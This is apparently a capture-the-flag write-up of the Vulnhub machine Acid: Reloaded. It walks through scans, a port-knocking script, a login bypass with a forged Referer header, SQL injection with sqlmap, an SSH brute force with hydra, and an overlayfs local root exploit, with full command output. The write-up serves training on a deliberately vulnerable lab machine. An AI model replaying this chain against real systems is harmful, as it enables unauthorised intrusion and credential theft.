[Vulnhub]acid_reloaded

Acid: Reloaded is created by Avinash Kumar Thapa

More information and OVA file download please check here.

Links

watch video online:

Attacker & Target

Attacker: Kali Linux (10.1.1.139/24)

Target: Acid: Server (10.1.1.130/24)

Vulnerability & Exploit

  • Ports knocking to active hidden ports
  • Hidden paths and files can be found via tool dirbuster
  • Web login bypass by add HTTP header Referer in Request
  • SQL injection vulnerability exists in http://10.1.1.139:33447/bin/l33t_haxor.php?id=, exploit it and check database to find hidden file location UB3R/strcpy.exe
  • Download and analyze the EXE file, found it binded with other files, use foremost tool to recover hidden files and find XML contacts file Avinash.contact
  • Making a dictionary file from the contact file, here need to note that there is a base64 encoded string, decode it and put in dictionary file
  • use HYDRA to brute force SSH service with dictionary file and found cracked login makke/NooB@123
  • Login as user makke, poking around and found Overlayfs Local Root (CVE-2015-1328) vulnerability exist and exploit it to get ROOT
  • overlayfs Local Root exploit (CVE-2015-1328) exist, exploit it to get ROOT

Method

  • Scanned the network to discover the target server [arp-scan]
  • Port scanned the target to discover the running services and open ports [unicornscan & nmap]
  • Write python script to make port knocking to active filtered ports
  • Web information gathering and interacting with the web server [firefox]
  • Web application scanning by Nikto to find more details or vulnerabilities [nikto]
  • Brute force scan to find hidden path [dirbuster]
  • Found the hidden web login page and bypass it
  • Exploit SQL injection vulnerability found in /bin/l33t_haxor.php?id= to get hidden file location UB3R/strcpy.exe
  • Use foremost to recover hidden files in strcpy.exe [foremost]
  • Create dictionary file and use HYDRA to brute force SSH login, and found makke/NooB@123
  • Enumeration and found the server is vulnerable to CVE-2015-1328, exploit it to get ROOT

Tools

All the tools used here can be found in Kali Linux

Walkthrough

Using arp-scan as routine to detect the target’s IP address (10.1.1.139 in this case).

1
2
3
4
5
6
7
8
9
10

root@kali:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.1.1.1  00:50:56:c0:00:08   VMware, Inc.
10.1.1.2  00:50:56:fd:d1:6b   VMware, Inc.
10.1.1.139    00:0c:29:bb:6e:b3   VMware, Inc.
10.1.1.254    00:50:56:e3:03:1b   VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.611 seconds (98.05 hosts/sec). 4 responded

10.1.1.139 is our Target!

Then run uniscornscan to detect opening ports on the target (unicornscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).

1
2
3
4
5
6
7
8
9

root@kali:~# us -msf -T4 -p1-65535 -Iv 10.1.1.139
adding 10.1.1.139/32 mode `TCPscan' ports `1-65535' pps 300
using interface(s) eth0
scaning 1.00e+00 total hosts with 6.55e+04 total packets, should take a little longer than 3 Minutes, 45 Seconds
connected 10.1.1.130:39969 -> 10.1.1.139:22
TCP open 10.1.1.139:22  ttl 64
sender statistics 288.7 pps with 65535 packets sent total
listener statistics 131072 packets recieved 0 packets droped and 0 interface drops
TCP open               ssh[   22]     from 10.1.1.139  ttl 64

Then I connect to target via SSH to grab banner.

1
2
3
4
5
6
7
8
9
10
11
12
13

root@kali:~# ssh 10.1.1.139
    _    ____ ___ ____        ____  _____ _     ___    _    ____  _____ ____  
   / \  / ___|_ _|  _ \      |  _ \| ____| |   / _ \  / \  |  _ \| ____|  _ \ 
  / _ \| |    | || | | |_____| |_) |  _| | |  | | | |/ _ \ | | | |  _| | | | |
 / ___ \ |___ | || |_| |_____|  _ <| |___| |__| |_| / ___ \| |_| | |___| |_| |
/_/   \_\____|___|____/      |_| \_\_____|_____\___/_/   \_\____/|_____|____/ 

                                  -by Acid

Wanna Knock me out ??? 
3.2.1 Let's Start the Game.
                                                                              
root@10.1.1.139's password:

Looks like we need ports knocking to find hidden ports. Then the following python script will do the port knocking

knock.py 
1
2
3
4
5
6
7
8
9
10
11
12

#!/usr/bin/python

from scapy.all import *

target = '10.1.1.139'
for x in reversed(range(1,4)):
    packet = IP(dst=target)/TCP(dport=x, flags="S")
    response = sr1(packet, timeout=0.5, verbose=0)
    if response != None:
        print '[+]knocking port ' + str(x)

print "[+]Done!"

Then use unicornscan to check again, found another port 33447

1
2
3
4
5
6
7
8
9
10
11
12

root@kali:~/acid_reload# us -msf -T4 -p1-65535 -Iv 10.1.1.139
adding 10.1.1.139/32 mode `TCPscan' ports `1-65535' pps 300
using interface(s) eth0
scaning 1.00e+00 total hosts with 6.55e+04 total packets, should take a little longer than 3 Minutes, 45 Seconds
connected 10.1.1.130:22339 -> 10.1.1.139:22
TCP open 10.1.1.139:22  ttl 64
connected 10.1.1.130:38957 -> 10.1.1.139:33447
TCP open 10.1.1.139:33447  ttl 64
sender statistics 277.8 pps with 65535 packets sent total
listener statistics 131078 packets recieved 0 packets droped and 0 interface drops
TCP open               ssh[   22]     from 10.1.1.139  ttl 64 
TCP open           unknown[33447]     from 10.1.1.139  ttl 64

Using NMAP scan to detect more information about opening services, and found WEB service is running on port 33447

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

root@kali:~/acid_reload# nmap -sV -v -p22,33447 -T4 10.1.1.139

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-11 07:26 EDT
NSE: Loaded 33 scripts for scanning.
Initiating ARP Ping Scan at 07:26
Scanning 10.1.1.139 [1 port]
Completed ARP Ping Scan at 07:26, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:26
Completed Parallel DNS resolution of 1 host. at 07:26, 0.02s elapsed
Initiating SYN Stealth Scan at 07:26
Scanning 10.1.1.139 [2 ports]
Discovered open port 22/tcp on 10.1.1.139
Discovered open port 33447/tcp on 10.1.1.139
Completed SYN Stealth Scan at 07:26, 0.21s elapsed (2 total ports)
Initiating Service scan at 07:26
Scanning 2 services on 10.1.1.139
Completed Service scan at 07:26, 11.04s elapsed (2 services on 1 host)
NSE: Script scanning 10.1.1.139.
Initiating NSE at 07:26
Completed NSE at 07:26, 0.34s elapsed
Nmap scan report for 10.1.1.139
Host is up (0.00050s latency).
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Ubuntu 5ubuntu1.3 (Ubuntu Linux; protocol 2.0)
33447/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
MAC Address: 00:0C:29:BB:6E:B3 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.65 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Run NIKTO scan to check the web application and found hidden folder /bin/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

root@kali:~# nikto -host http://10.1.1.139:3344/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ No web server found on 10.1.1.139:3344
---------------------------------------------------------------------------
+ 0 host(s) tested
root@kali:~# nikto -host http://10.1.1.139:33447/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.1.1.139
+ Target Hostname:    10.1.1.139
+ Target Port:        33447
+ Start Time:         2015-09-11 07:31:36 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x2aa 0x51e107200fa1d 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1:33447/images/".
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3092: /bin/: This might be interesting...
+ OSVDB-3092: /bin/: This might be interesting... possibly a system shell found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8330 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2015-09-11 07:31:58 (GMT-4) (22 seconds)
---------------------------------------------------------------------------

check the new folder /bin/ found a login page. By checking the source code, the login process function is in /includes/validation.php

1

<h2>Login to your account</h2>   <form action="includes/validation.php" method="post" name="login_form">  Email: <input type="text" placeholder="Email Address" name="email" maxlength="20" />  Password: <input type="password" placeholder="Password" name="password" id="password"/>  <input type="submit" value="Login" onclick="formhash(this.form, this.form.password);" />  </form>   </form>

Then using dirbuster to brute force hidden files and paths and found the page /bin/dashboard.php

After a lot of failed tests, I finally found that HTTP header trick to bypass the login by adding the header Referere: http://10.1.1.139:33447/bin/includes/validation.php, Burp proxy help me to get next step.

Then I reach here http://10.1.1.139:33447/bin/l33t_haxor.php, by checking the source code I found the following URL http://10.1.1.139:33447/bin/l33t_haxor.php?id= and the parameter id is SQL injectable.

Using SQLMAP to exploit the SQL injection vulnerability and found the current database and tables:

1
2
3
4
5
6
7

...
available databases [4]:                                                                                                                                                           
[*] information_schema
[*] mysql
[*] performance_schema
[*] secure_login
...
1
2
3
4
5
6
7
8
9
10

...
Database: secure_login                                                                                                                                                             
[4 tables]
+-----------------+
| UB3R/strcpy.exe |
| login_attempts  |
| members         |
| word            |
+-----------------+
...

from the SQL injection exploit, I found UB3R/strcpy.exe which is interesting. Then I downloaded the binary file from http://10.1.1.139:33447/UB3R/strcpy.exe. By checking the file, I found there are some other files hidden in strcpy.exe, so I use foremost to recover them

keep the same steps as above until we found the file Avinash.contact which is a XML file and there is a string is base64 encoded. Then I decoded it and got NooB@123

Then I created a dictionary file based on the names/keywords in file Avinash.contact

1
2
3
4
5
6
7
8
9

root@kali:~/acid_reload# cat dict.txt 
Avinash
avinash
Makke
makke
acid
acid.exploit
acid.exploit@gmail.com
NooB@123

Then I use hydra with the file dict.txt to brute force SSH login, and found makke/NooB@123:

1
2
3
4
5
6
7
8
9
10
11
12

root@kali:~/acid_reload# hydra -L dict.txt -P dict.txt 10.1.1.139 ssh -s 22
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2015-09-11 08:49:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 64 login tries (l:8/p:8), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 10.1.1.139   login: makke   password: NooB@123
[22][ssh] host: 10.1.1.139   login: makke   password: NooB@123
1 of 1 target successfully completed, 2 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-09-11 08:49:46

Login to the SSH with makke’s login

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

root@kali:~/acid_reload# ssh makke@10.1.1.139 
    _    ____ ___ ____        ____  _____ _     ___    _    ____  _____ ____  
   / \  / ___|_ _|  _ \      |  _ \| ____| |   / _ \  / \  |  _ \| ____|  _ \ 
  / _ \| |    | || | | |_____| |_) |  _| | |  | | | |/ _ \ | | | |  _| | | | |
 / ___ \ |___ | || |_| |_____|  _ <| |___| |__| |_| / ___ \| |_| | |___| |_| |
/_/   \_\____|___|____/      |_| \_\_____|_____\___/_/   \_\____/|_____|____/ 

                                  -by Acid

Wanna Knock me out ??? 
3.2.1 Let's Start the Game.
                                                                              
makke@10.1.1.139's password: 
Welcome to Ubuntu 15.04 (GNU/Linux 3.19.0-15-generic i686)

 * Documentation:  https://help.ubuntu.com/

134 packages can be updated.
80 updates are security updates.

Last login: Thu Sep 10 17:10:50 2015 from 10.1.1.130
makke@acid:~$ id
uid=1001(makke) gid=1001(makke) groups=1001(makke)
makke@acid:~$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:bb:6e:b3  
          inet addr:10.1.1.139  Bcast:10.1.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:febb:6eb3/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:312455 errors:0 dropped:0 overruns:0 frame:0
          TX packets:319819 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:53077085 (53.0 MB)  TX bytes:41973680 (41.9 MB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:3026 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3026 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:301825 (301.8 KB)  TX bytes:301825 (301.8 KB)

makke@acid:~$

Poking around and found clues in file .bash_history

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52

makke@acid:~$ ls -ah
.  ..  .bash_history  .bash_logout  .bashrc  .cache  .hint  .profile
makke@acid:~$ ls -ahl
total 32K
drwxr-xr-x 3 makke makke 4.0K Aug 24 21:28 .
drwxr-xr-x 4 root  root  4.0K Aug 24 19:11 ..
-rw------- 1 makke makke  272 Sep 10 17:13 .bash_history
-rw-r--r-- 1 makke makke  220 Aug 24 19:11 .bash_logout
-rw-r--r-- 1 makke makke 3.7K Aug 24 19:11 .bashrc
drwx------ 2 makke makke 4.0K Aug 24 21:25 .cache
-rw-rw-r-- 1 makke makke   40 Aug 24 21:28 .hint
-rw-r--r-- 1 makke makke  675 Aug 24 19:11 .profile
makke@acid:~$ cat .bash_history
exit
cd ..
clear
cd /
ls
cd bin/
clear
./overlayfs 
clear
cd /home/makke/
clear
nano .hint
clear
ls
clear
ls
ls -a
cat .hint 
clear
cd /bin/
ls
./overlayfs 
clear
wgt
wget
apt-get remove wget
su
su -
exit
id
pwd
ls
ls -l
pwd
ls -alh
cat .bash_history
/bin/overlayfs 
exit
makke@acid:~$ cat .bash_history

From the output above, there is an executable file /bin/overlayfs which is overlayfs local root exploit file.

1
2

makke@acid:~$ ls -al /bin/overlayfs 
-rwxr-xr-x 1 root root 12236 Aug 24 21:22 /bin/overlayfs

run it and ROOT!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

makke@acid:~$ /bin/overlayfs 
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(makke)
# cd root
sh: 2: cd: can't cd to root
# cd /root
# ls -al
total 68
drwx------  5 root root  4096 Aug 24 21:32 .
drwxr-xr-x 22 root root  4096 Aug 24 20:58 ..
-rw-------  1 root root 23934 Aug 24 22:25 .bash_history
-rw-r--r--  1 root root  3135 Aug  8 18:02 .bashrc
drwx------  2 root root  4096 Aug 24 17:46 .cache
drwx------  3 root root  4096 Aug  6 17:55 .config
drwx------  3 root root  4096 Aug  6 15:51 .dbus
-rw-r--r--  1 root root   284 Aug 24 20:57 .flag.txt
-rw-------  1 root root  2775 Aug 24 21:32 .mysql_history
-rw-------  1 root root   147 Aug 24 23:32 .nano_history
-rw-r--r--  1 root root   140 Feb 20  2014 .profile
-rw-r--r--  1 root root    66 Aug  6 17:31 .selected_editor
# cat .flag.txt
Dear Hax0r,

You have completed the Challenge Successfully.

Your Flag is : "Black@Current@Ice-Cream"

Kind & Best Regards

-ACiD

Twitter:https://twitter.com/m_avinash143
Facebook: https://www.facebook.com/M.avinash143
LinkedIN: https://in.linkedin.com/pub/avinash-thapa/101/406/4b5
#

Done!

2015-09-12 21:49:42 +1000
acid_reloaded, cve-2015-1328, sql injection, vulnhub